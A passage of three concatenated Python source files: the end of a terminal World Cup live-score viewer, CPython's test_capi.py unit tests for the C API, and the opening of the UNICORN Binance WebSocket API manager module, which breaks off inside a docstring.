print Fore.YELLOW + '%s%s%s%s%s' % (
'Available commands: today, tomorrow, c, h.\n',
'Live updates start when a match starts.\n',
'Made with ', u"\U00002764", ' by @silvamatteus.\n',)
def clear_screen():
print("\033[H\033[J")
def print_art():
print Fore.GREEN + Style.DIM + ASCII_ART
def print_many_matches(matches, msg=None):
if msg:
print ' ' * (SCREEN_WIDTH/2 - len(msg)/2) + Style.DIM + Back.WHITE + Fore.CYAN + u"\U0001f4c6" + ' ' + msg
for match in matches:
print_match(match)
def print_match(info, is_live=False):
if is_live:
clear_screen()
print_art()
print '\n' + Fore.BLACK + Style.BRIGHT + Back.LIGHTWHITE_EX + u"\U0001f4fa" + ' LIVE ' + u"\U0001f4fa" + ' ' + Fore.YELLOW + Style.DIM + Back.RESET + ' (every ' + str(UPDATE_TIME) + ' seconds)'
goals_home = info['home_team']['goals']
goals_away = info['away_team']['goals']
print Fore.BLUE + '-' * SCREEN_WIDTH,
print
print info['home_team']['code'],
print Fore.GREEN + Style.BRIGHT + (SOCCER_BALL + ' ') * goals_home,
print' ' * (SCREEN_WIDTH/2 - goals_home * 2 - 6),
print 'x ' + ' ' * (SCREEN_WIDTH/2 - goals_away * 2 - 6),
print Fore.GREEN + Style.BRIGHT + (SOCCER_BALL + ' ') * goals_away,
print info['away_team']['code']
if info['home_team_statistics'] and info['away_team_statistics']:
home_ball_possession = info['home_team_statistics']['ball_possession']
away_ball_possession = info['away_team_statistics']['ball_possession']
if home_ball_possession and away_ball_possession:
home_ball_possession = '%02d' % int(home_ball_possession)
away_ball_possession = '%02d' % int(away_ball_possession)
print Fore.BLUE + '-' * (SCREEN_WIDTH/2 -13) + ' ' + Fore.GREEN + home_ball_possession +' - Ball Possession - ' + away_ball_possession + Fore.BLUE + ' ' + '-' * (SCREEN_WIDTH/2 -13)
if info['status'] != 'in progress':
print 'Match Status:' + Fore.MAGENTA + ' %s' % info['status']
else:
print Fore.GREEN + Style.DIM + u"\U0001f557" + ' %s' % info['time']
if info['datetime']:
start_time = dateutil.parser.parse(info['datetime'])
start_time += timedelta(hours=TIME_DIFFERENCE)
print Fore.MAGENTA + u"\U0001f4c6" + ' %s' % start_time.strftime('%Y-%m-%d'),
print Fore.MAGENTA + u"\U0001f557" + ' %s' % start_time.strftime('%H:%M')
#TODO: print start time and current time.
# Print goals and details.
if info['status'] != 'future':
home_attempts_on_goal = info['home_team_statistics']['attempts_on_goal']
home_on_target = info['home_team_statistics']['on_target']
away_attempts_on_goal = info['away_team_statistics']['attempts_on_goal']
away_on_target = info['away_team_statistics']['on_target']
if not home_attempts_on_goal: home_attempts_on_goal = 0
if not away_attempts_on_goal: away_attempts_on_goal = 0
if not home_on_target: home_on_target = 0
if not away_on_target: away_on_target = 0
output = 'Attempts on goal / On target'
print Fore.BLUE + Style.BRIGHT + ' ' * ((SCREEN_WIDTH/2) - len(output)/2) + output
output = str(home_attempts_on_goal) + ' / ' + str(home_on_target) + ' - ' + str(away_attempts_on_goal) + ' / ' + str(away_on_target)
print Fore.BLUE + Style.BRIGHT + ' ' * (SCREEN_WIDTH/2 - len(output)/2) + output
# Print Yellow cards.
#home_yellow_cards = info['home_team_statistics']['yellow_cards'] if 'yellow_cards' in info['home_team_statistics'] else '0'
#away_yellow_cards = info['away_team_statistics']['yellow_cards'] if 'yellow_cards' in info['away_team_statistics'] else '0'
if info['status'] != 'future':
print Fore.CYAN + ' ' * (SCREEN_WIDTH/2 -16) + '- ' + SOCCER_BALL + ' Detailed Goals Information -'
#TODO: print details.
goal_events_home = [event for event in info['home_team_events'] if event['type_of_event'] == 'goal' or event['type_of_event'] == 'goal-penalty']
goal_events_away = [event for event in info['away_team_events'] if event['type_of_event'] == 'goal' or event['type_of_event'] == 'goal-penalty']
i_events_home = 0
i_events_away = 0
for home_event, away_event in zip(goal_events_home, goal_events_away):
output = home_event['player'] + ' ' + home_event['time']
print Fore.CYAN + output + ' ' * (SCREEN_WIDTH/2 - len(output)) + u"\U0001f557",
output = away_event['time'] + ' ' + away_event['player']
print Fore.CYAN + ' ' * (SCREEN_WIDTH/2 - len(output) -1) + output
i_events_home += 1
i_events_away += 1
while i_events_home < len(goal_events_home):
output = goal_events_home[i_events_home]['player'] + ' ' + goal_events_home[i_events_home]['time']
print Fore.CYAN + output + ' ' * (SCREEN_WIDTH/2 - len(output)) + u"\U0001f557"
i_events_home += 1
while i_events_away < len(goal_events_away):
print Fore.CYAN + ' ' * (SCREEN_WIDTH/2) + u"\U0001f557",
output = goal_events_away[i_events_away]['time'] + ' ' + goal_events_away[i_events_away]['player']
print Fore.CYAN + ' ' * (SCREEN_WIDTH/2 - len(output) -1) + output
i_events_away += 1
print '\n' + ' ' * (SCREEN_WIDTH/2-1) + '···\n'
def get_live_match(lock):
while True:
info = []
try:
info = json.loads(requests.get('http://worldcup.sfg.io/matches/current').text)
except Exception:
print Fore.RED + 'Oops! I can\'t connect to the API =\'('
if not info:
lock.acquire()
clear_screen()
print_art()
print '\n' + Fore.BLACK + Style.BRIGHT + Back.LIGHTWHITE_EX + u"\U0001f4fa" + ' No live match found.'
lock.release()
sleep(90)
continue
lock.acquire()
print_match(info[0], is_live=True)
lock.release()
sleep(UPDATE_TIME)
def interact(lock):
while True:
command = raw_input()
if command == 'today':
todays_matches = []
try:
todays_matches = json.loads(requests.get('http://worldcup.sfg.io/matches/today').text)
except Exception:
print Fore.RED + 'Oops! I can\'t connect to the API =\'('
lock.acquire()
print_many_matches(todays_matches, msg='Today\'s Matches:')
lock.release()
elif command == 'tomorrow':
tomorrow_matches = []
try:
tomorrow_matches = json.loads(requests.get('http://worldcup.sfg.io/matches/tomorrow').text)
except Exception:
print Fore.RED + 'Oops! I can\'t connect to the API =\'('
lock.acquire()
print_many_matches(tomorrow_matches, msg='Tomorrow\'s Matches:')
lock.release()
elif command == 'c':
clear_screen()
print_art()
elif command == 'h' or command == 'help':
print_help()
else:
lock.acquire()
print NOT_RECOGNIZE
print_help()
lock.release()
def sigterm_handler(signal, frame):
# save the state here or do whatever you want
sys.exit(0)
if __name__ == '__main__':
# Setup signal handlers.
signal.signal(signal.SIGINT, sigterm_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
# Lock for prints
lock = Lock()
# Init colorama
init(autoreset=True)
clear_screen()
print_art()
Process(target=get_live_match, args=([lock])).start()
interact(lock)
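# Design note: get_live_match() runs in a child Process so that the blocking
# raw_input() loop in interact() keeps the terminal responsive; the shared
# Lock serializes both processes' writes to stdout.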
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
import os
import pickle
import random
import subprocess
import sys
import time
import unittest
from test import support
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import threading
except ImportError:
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
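# _testcapi.instancemethod wraps a callable via PyInstanceMethod_New(), so the
# wrapped function binds like an ordinary method when accessed on an instance.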
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_no_FatalError_infinite_loop(self):
with support.suppress_crash_popup():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.fail("ValueError was not raised")
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l has grown to n entries
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
for i in range(context.nThreads):
t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
t.start()
threads.append(t)
self.pendingcalls_wait(context.l, n, context)
for t in threads:
t.join()
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = _testcapi.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTest(unittest.TestCase):
@unittest.skipIf(
sys.platform.startswith('win'),
"test doesn't work under Windows")
def test_subinterps(self):
# XXX only tested under Unix checkouts
basepath = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
oldcwd = os.getcwd()
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
os.chdir(basepath)
try:
exe = os.path.join(basepath, "Modules", "_testembed")
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
p = subprocess.Popen([exe],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
if support.verbose:
print()
print(out.decode('latin1'))
print(err.decode('latin1'))
finally:
os.chdir(oldcwd)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() return consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accommodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
# (note: the format string must be bytes!)
_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format.encode("ascii"), keywords)
when_not_skipped = False
except TypeError as e:
s = "argument 1 must be impossible<bad format char>, not int"
when_not_skipped = (str(e) == s)
except RuntimeError as e:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format.encode("ascii"), keywords)
when_skipped = False
except RuntimeError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# parse_tuple_and_keywords error handling tests
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [42])
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
test()
if __name__ == "__main__":
unittest.main()
|
unicorn_binance_websocket_api_manager.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: unicorn_binance_websocket_api/unicorn_binance_websocket_api_manager.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from .unicorn_binance_websocket_api_exceptions import StreamRecoveryError, UnknownExchange
from .unicorn_binance_websocket_api_socket import BinanceWebSocketApiSocket
from .unicorn_binance_websocket_api_restclient import BinanceWebSocketApiRestclient
from .unicorn_binance_websocket_api_restserver import BinanceWebSocketApiRestServer
from cheroot import wsgi
from collections import deque
from datetime import datetime
from flask import Flask, redirect
from flask_restful import Api
import asyncio
import colorama
import copy
import logging
import os
import platform
import psutil
import re
import requests
import sys
import threading
import time
import uuid
import ujson as json
import websockets
logger = logging.getLogger(__name__)
class BinanceWebSocketApiManager(threading.Thread):
"""
An unofficial Python API to use the Binance WebSocket APIs (com+testnet, com-margin+testnet,
com-isolated_margin+testnet, com-futures+testnet, us, jex, dex/chain+testnet) in an easy, fast, flexible,
robust and fully-featured way.
This library supports two different kinds of websocket endpoints:
- CEX (Centralized exchange): binance.com, binance.vision, binance.je, binance.us, trbinance.com, jex.com
- DEX (Decentralized exchange): binance.org
Binance.com websocket API documentation:
- https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md
- https://binance-docs.github.io/apidocs/futures/en/#user-data-streams
- https://binance-docs.github.io/apidocs/spot/en/#user-data-streams
Binance.vision (Testnet) websocket API documentation:
- https://testnet.binance.vision/
Binance.us websocket API documentation:
- https://github.com/binance-us/binance-official-api-docs/blob/master/web-socket-streams.md
- https://github.com/binance-us/binance-official-api-docs/blob/master/user-data-stream.md
TRBinance.com websocket API documentation:
- https://www.trbinance.com/apidocs/#general-wss-information
Jex.com websocket API documentation:
- https://jexapi.github.io/api-doc/option.html#web-socket-streams
- https://jexapi.github.io/api-doc/option.html#user-data-streams
Binance.org websocket API documentation:
- https://docs.binance.org/api-reference/dex-api/ws-connection.html
:param process_stream_data: Provide a function/method to process the received webstream data. The function
will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data, stream_buffer_name)` where
`stream_data` contains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer! `How to read from stream_buffer!
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
:param exchange: Select binance.com, binance.com-testnet, binance.com-margin, binance.com-margin-testnet,
binance.com-isolated_margin, binance.com-isolated_margin-testnet, binance.com-futures,
binance.com-futures-testnet, binance.com-coin_futures, binance.us, trbinance.com,
jex.com, binance.org or binance.org-testnet (default: binance.com)
:type exchange: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:param throw_exception_if_unrepairable: set to `True` to activate exceptions if a crashed stream is unrepairable
(invalid API key, exceeded subscription limit) or an unknown exchange is
used
:type throw_exception_if_unrepairable: bool
:param restart_timeout: A stream restart must be successful within this time, otherwise a new restart will be
initialized. Default is 6 seconds.
:type restart_timeout: int
:param show_secrets_in_logs: set to True to show secrets like listen_key, api_key or api_secret in log file
(default=False)
:type show_secrets_in_logs: bool
:param output_default: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise
with the default setting "raw_data" the output remains unchanged and gets delivered as
received from the endpoints. Change this for a specific stream with the `output` parameter
of `create_stream()` and `replace_stream()`
:type output_default: str
:param enable_stream_signal_buffer: set to True to enable the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and receive information about
disconnects and reconnects to manage a restore of the lost data during the
interruption or to recognize that your bot has gone blind.
:type enable_stream_signal_buffer: bool
:param disable_colorama: set to True to disable the use of `colorama <https://pypi.org/project/colorama/>`_
:type disable_colorama: bool
:param stream_buffer_maxlen: Set a max len for the generic `stream_buffer`. This parameter can also be used within
`create_stream()` for a specific `stream_buffer`.
:type stream_buffer_maxlen: int or None
:param process_stream_signals: Provide a function/method to process the received stream signals. The function
will be called instead of
`add_to_stream_signal_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.add_to_stream_signal_buffer>`_
like `process_stream_signals(signal_type=False, stream_id=False, data_record=False)`.
:type process_stream_signals: function
"""
def __init__(self,
process_stream_data=False,
exchange="binance.com",
warn_on_update=True,
throw_exception_if_unrepairable=False,
restart_timeout=6,
show_secrets_in_logs=False,
output_default="raw_data",
enable_stream_signal_buffer=False,
disable_colorama=False,
stream_buffer_maxlen=None,
process_stream_signals=False):
threading.Thread.__init__(self)
self.name = "unicorn-binance-websocket-api"
self.version = "1.34.2.dev"
logger.info(f"New instance of {self.get_user_agent()} on "
f"{str(platform.system())} {str(platform.release())} for exchange {exchange} started ...")
if disable_colorama is not True:
logger.info(f"Initiating `colorama_{colorama.__version__}`")
colorama.init()
logger.info(f"Using `websockets_{websockets.__version__}`")
if process_stream_data is False:
# no special method to process stream data provided, so we use add_to_stream_buffer:
self.process_stream_data = self.add_to_stream_buffer
logger.info(f"Using `stream_buffer`")
else:
# use the provided method to process stream data:
self.process_stream_data = process_stream_data
logger.info(f"Using `process_stream_data`")
if process_stream_signals is False:
# no special method to process stream signals provided, so we use add_to_stream_signal_buffer:
self.process_stream_signals = self.add_to_stream_signal_buffer
logger.info(f"Using `stream_signal_buffer`")
else:
# use the provided method to process stream signals:
self.process_stream_signals = process_stream_signals
logger.info(f"Using `process_stream_signals` ...")
self.exchange = exchange
if self.exchange == "binance.com":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-futures":
self.websocket_base_uri = "wss://fstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-coin-futures" or self.exchange == "binance.com-coin_futures":
self.websocket_base_uri = "wss://dstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-futures-testnet":
self.websocket_base_uri = "wss://stream.binancefuture.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.us":
self.websocket_base_uri = "wss://stream.binance.us:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "trbinance.com":
self.websocket_base_uri = "wss://stream.binance.cc/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "jex.com":
self.websocket_base_uri = "wss://ws.jex.com/"
self.max_subscriptions_per_stream = 10
elif self.exchange == "binance.org":
self.websocket_base_uri = "wss://dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.org-testnet":
self.websocket_base_uri = "wss://testnet-dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
else:
# Unknown Exchange
error_msg = f"Unknown exchange '{str(self.exchange)}'! Read the docs to see a list of supported " \
"exchanges: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_" \
"binance_websocket_api.html#module-unicorn_binance_websocket_api.unicorn_binance_websocket_" \
"api_manager"
logger.critical(error_msg)
raise UnknownExchange(error_msg)
self.stop_manager_request = None
self.all_subscriptions_number = 0
self.binance_api_status = {'weight': None,
'timestamp': 0,
'status_code': None}
self.dex_user_address = False
self.enable_stream_signal_buffer = enable_stream_signal_buffer
self.event_loops = {}
self.frequent_checks_list = {}
self.frequent_checks_list_lock = threading.Lock()
self.receiving_speed_average = 0
self.receiving_speed_peak = {'value': 0,
'timestamp': time.time()}
self.keep_max_received_last_second_entries = 5
self.keepalive_streams_list = {}
self.last_entry_added_to_stream_buffer = 0
self.last_monitoring_check = time.time()
self.last_update_check_github = {'timestamp': time.time(),
'status': None}
self.last_update_check_github_check_command = {'timestamp': time.time(),
'status': None}
self.max_send_messages_per_second = 5
self.max_send_messages_per_second_reserve = 2
self.most_receives_per_second = 0
self.monitoring_api_server = False
self.monitoring_total_received_bytes = 0
self.monitoring_total_receives = 0
self.output_default = output_default
self.reconnects = 0
self.reconnects_lock = threading.Lock()
self.request_id = 0
self.request_id_lock = threading.Lock()
self.restart_requests = {}
self.restart_timeout = restart_timeout
self.ringbuffer_error = []
self.ringbuffer_error_max_size = 500
self.ringbuffer_result = []
self.ringbuffer_result_max_size = 500
self.show_secrets_in_logs = show_secrets_in_logs
self.start_time = time.time()
self.stream_buffer_maxlen = stream_buffer_maxlen
self.stream_buffer = deque(maxlen=self.stream_buffer_maxlen)
self.stream_buffer_lock = threading.Lock()
self.stream_buffer_locks = {}
self.stream_buffers = {}
self.stream_list = {}
self.stream_list_lock = threading.Lock()
self.stream_signal_buffer = deque()
self.stream_signal_buffer_lock = threading.Lock()
self.stream_threading_lock = {}
self.throw_exception_if_unrepairable = throw_exception_if_unrepairable
self.total_received_bytes = 0
self.total_received_bytes_lock = threading.Lock()
self.total_receives = 0
self.total_receives_lock = threading.Lock()
self.total_transmitted = 0
self.total_transmitted_lock = threading.Lock()
self.websocket_list = {}
self.start()
self.replaced_secrets_text = "***SECRET_REMOVED***"
self.restclient = BinanceWebSocketApiRestclient(self)
if warn_on_update and self.is_update_availabe():
update_msg = f"Release {self.name}_" + self.get_latest_version() + " is available, " \
"please consider updating! (Changelog: https://github.com/oliver-zehentleitner/unicorn-" \
"binance-websocket-api/blob/master/CHANGELOG.md)"
print(update_msg)
logger.warning(update_msg)
def _add_stream_to_stream_list(self,
stream_id,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=False,
ping_timeout=False,
close_timeout=False,
stream_buffer_maxlen=None):
"""
Create a list entry for new streams
:param stream_id: provide a stream_id (only needed for userData streams to acquire a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label for the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globally overwritten with the parameter
`output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of `BinanceWebSocketApiManager()`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
